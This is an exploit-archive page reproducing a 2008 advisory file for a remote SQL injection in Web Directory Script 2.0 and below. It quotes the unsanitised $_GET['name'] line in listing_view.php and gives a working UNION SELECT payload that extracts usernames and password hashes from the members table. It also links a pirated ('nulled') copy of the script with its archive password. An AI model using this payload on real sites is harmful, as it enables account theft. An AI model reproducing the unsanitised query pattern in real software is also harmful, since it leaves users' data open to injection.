wds-sql.txt

wds-sql.txt: Posted Aug 26, 2008; Authored by ~!Dok_tOR!~ | Site antichat.ru; Web Directory Script versions 2.0 and below suffer form a remote SQL injection vulnerability.; tags | exploit, remote, web, sql injection; SHA-256 | 36471eff0f93c7571862502aed38288fa57f06de4f2dbd64bf423bd3d2765353; Download | Favorite | View

wds-sql.txt

Web Directory Script <= 2.0 SQL Injection Vulnerability

Author: ~!Dok_tOR!~
Contact: coder5(at)topmail.kz 
Home Page: www.antichat.ru
Date found: 23.08.08
Product: Web Directory Script
Version: 2.0
Download script: https://rapidshare.com/files/121448809/W3bDirScr2-nullscript.net.rar
Password: nullscript.net
Vulnerability Class: SQL Injection

listing_view.php

Vuln code:

$friendly_url=$_GET['name'];

https://localhost/[installdir]/

magic_quotes_gpc = Off

Exploit:

listing_view.php?name='+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+members/*

Thanks: Zitt, rijy, Koller, NOmeR1, $n@]<e, n0ne, +toxa+, [cash], ettee, HiM@S and All members of antichat.ru and xaker.name .

Top Authors In Last 30 Days

Red Hat 239 files
Ubuntu 62 files
Debian 23 files
LiquidWorm 20 files
Apple 9 files
indoushka 5 files
Gentoo 5 files
Google Security Research 4 files
Chokri Hammedi 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,862)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,265)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,976)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

wds-sql.txt

wds-sql.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

wds-sql.txt

Share This

wds-sql.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems